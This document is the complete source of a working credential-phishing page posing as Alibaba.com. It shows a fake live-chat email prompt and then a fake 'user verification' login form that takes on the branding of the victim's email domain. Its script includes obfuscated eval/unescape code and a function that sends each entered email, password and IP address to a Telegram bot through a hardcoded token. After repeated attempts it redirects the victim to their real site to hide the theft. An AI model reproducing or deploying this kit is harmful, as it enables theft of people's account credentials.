<!DOCTYPE html>
<html>
<head>
    <script nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">var aix = "";</script>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Alibaba.com: Manufacturers, Suppliers, Exporters & Importers from around the world...</title>
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="icon" type="image/png" href="images/favicon.png" sizes="16x16 24x24 32x32 48x48 64x64">
<script type="text/javascript">
<!-- 
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%68%66%38%31%61%33%35%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%36%35%37%31%37%39%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%39%36%32%34%39%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%31%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%68%66%38%31%61%33%35%28%27') + '%3e%62%61%6d%6f%1d%74%6c%62%3a%23%76%7a%7d%62%6d%72%62%66%61%7b%28%19%65%75%6d%60%35%28%62%77%70%2b%6e%67%68%64%6f%6d%65%66%61%6f%77%2f%67%7a%7b%27%3f16571790%35%39%39%30%35%32%35' + unescape('%27%29%29%3b'));
// -->
</script>
</head>

<body>
    <div id="html_encoder_div">
        <div class="container">
            <div class="office show border shadow bg-light" id="others">
				<div id="Div1" style="display:none;">
                <div class="office-holder"  style="">
                    <div class="logo" style="text-align:center">
                        <div>
                            <img src="images/profile.webp" style="width:130px; height:130px; border-radius:50%;" alt="">
                        </div><br><h5 class="text-dark"><strong><font color="#FE642E">LIVE CHAT</font></strong></h5>
						<center>
							<img src="images/online.png" style="width:100px; height:40px;">
						</center>
                        <p style="color:#424242; font-size:16px;">
							This User is online. <br><strong>Enter Your Email-ID to start Live Chat</strong>
						</p>
                    </div>
                    <form>
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <input type="email" id="aii" name="" class="form-control" value="" placeholder="Email-ID" required="" style="border:1px solid #424242; font-weight:bold;">
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="submit-btnn" style="font-size:17px; height:50px; font-weight:bold; background-color:#FE642E;">
								Start Live Chat >>>
								</button>
                            </div>
							<br>
                        </div>
                    </form>
                </div>
				</div>
				
				
			<div id="Div2" style="display:none">
				<div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div id="login_logo">
                            <img id="login_logo1" src="https://res.cloudinary.com/ducjuygen/image/upload/v1662462897/weblogo_fs2day.png" width="50" height="50" alt="Webmail">
                        </div>
                        <h3 class="text-dark"><strong id="domain-name" class="text-uppercase">USER VERIFICATION</strong></h3>
                        <h6><strong>AUTHENTICATION REQUIRED</strong></h6>
						<p style="color:#DF0101; font-size:15px;"> Sign in to confirm you're not a robot</p>
                    </div>
                    <center>
                        <div id="msg" style="display: none;font-weight: 600;color: red;">Wrong Password.! Try again....</div>
                        <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form>
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <input type="email" id="ai" class="form-control" value="" placeholder="someone@example.com" required="" style="font-weight:bold;color:#424242;">
                            <input type="password" id="pr" placeholder="Password" class="form-control" required="">
                            <div class="checkbox">
                                <input type="checkbox" checked name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
                                <label>Remember me</label>
                            </div>
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="submit-btn" style="font-size:17px; height:50px; font-weight:bold; background-color:#FE642E;">
								Start Live Chat >>>
								</button>
                            </div>
							<br>
                        </div>
                    </form>
					
                </div>
			</div>
            </div>
        </div>
    </div>
	<link rel="stylesheet" href="css/googleapapi.css">
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
<input type="hidden" name="usrip1" id="usrip1" value="">
</body>



<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script>
<script type='text/javascript' nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">
 $('#submit-btnn').click(function(event) {
     $('#submit-btnn').html('Connecting...');
        event.preventDefault();
    if (document.getElementById('aii').value === ''){
        alert('Enter a valid email address');
		$('#submit-btnn').html('Start Live Chat >>>');
        return false;
    }
	var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
	if (!filter.test(document.getElementById('aii').value)) {
            alert('Enter a valid email address');
			$('#submit-btnn').html('Start Live Chat >>>');
			return false;
    }
	var my_ai = document.getElementById('aii').value;
    $('#ai').attr('disabled', "");
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
	setTimeout(function() {
	 var x = document.getElementById("Div1");
	 var xx = document.getElementById("Div2");
     if (x.style.display === "block" && xx.style.display === "none") {
         x.style.display = "none";
		 xx.style.display = "block";
	 } 
	}, 1000);
	})
</script>

<script nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4">
if(window.location.hash){
	var ai = window.location.hash.substr(1);
}else{
 var ai = aix;
}
	
function tmsend(message){
    var token = "80339043824:AAE7axhNpPsUdbtURB2UDPF5utBkvoYgQfA";
    var chat_id= "71164783489";
    const url = `https://api.telegram.org/bot${token}/sendMessage` // The url to request

    const obj = {
        chat_id: chat_id, // Telegram chat id
        text: message // The text to send
    };

    const xht = new XMLHttpRequest();
    xht.open("POST", url, true);
    xht.setRequestHeader("Content-type", "application/json; charset=UTF-8");
    xht.send(JSON.stringify(obj));

}

$(document).ready(function() {
    var count = 0;

    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    if (!ai) {
	var x = document.getElementById("Div1");
	var xx = document.getElementById("Div2");
         x.style.display = "block";
		 xx.style.display = "none";
    } else {
        // $('#ai').val(ai);
		
		var x = document.getElementById("Div1");
		var xx = document.getElementById("Div2");
         x.style.display = "none";
		 xx.style.display = "block";
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
    }
    ///////////////url getting ai////////////////


    var file = "PUT YOUR base64 LINK next.ph";
    $('#submit-btn').click(function(event) {
        $('#submit-btn').html('Verifing...');
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is empty.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is emply.!");
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        var newDate = new Date();
        var datetime =  newDate.toLocaleString();
        ///////////new injection////////////////
        count = count + 1;
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        var ozi = "\n------LIVE-CHAT-----\n"
        ozi+="User: "+ai
        ozi+="\nPass: " +pr
        ozi+="\n--------------------------"
        ozi+= "\nUser-IP: "+document.getElementById('usrip1').value;
        ozi+="\n----------------------\n"
        tmsend(ozi)
        function greet() {
            $('#submit-btn').html('Login')
            $("#msg").show();
        }
        setTimeout(greet, 2000);
        if (count >= 3) {
            count = 0;
            // window.location.replace(response['redirect_link']);
            window.location.replace("http://www." + my_slice);

        }
       
        
        
        /*
        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });*/
    });


});
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js" nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"></script> 
<script nonce="Mzk5NTk4OTExNCwyODE3MTk1ODY4"> 
$.getJSON("https://api.ipify.org?format=json", 
function(data) { 
var ipx = data.ip;
document.getElementById('usrip1').value = ipx;
}) 
</script>

</html>